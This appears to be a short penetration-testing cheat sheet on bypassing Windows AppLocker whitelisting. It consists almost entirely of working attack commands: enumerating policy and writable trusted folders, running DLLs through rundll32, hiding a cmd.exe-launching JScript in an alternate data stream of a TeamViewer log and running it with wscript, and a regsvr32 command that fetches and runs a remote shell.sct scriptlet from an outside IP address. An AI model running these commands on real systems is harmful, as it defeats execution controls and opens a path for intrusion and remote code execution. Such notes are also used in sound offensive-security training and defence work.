Application Whitelisting Bypass
Get-AppLockerPolicy -Local
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
AppLocker Basic Bypass
Trusted Folders (usually C:\Windows\Tasks is clear)
accesschk.exe "user" C:\Windows -wus
icacls.exe
rundll32 to execute unmanaged DLLs
rundll32 .\TestDll.dll,run
Alternate Data Streams (ADS)
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
Find a user writable and executable file (find a file in trusted location)
type poc.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log"
dir /r "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log"
wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:poc.js"
3rd Party Execution
System binary abuse
https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba
regsvr32 /s /n /u /i:http://192.168.119.120/shell.sct scrobj.dll
regsvr32 /s /u /i:shell.sct scrobj.dll
Last updated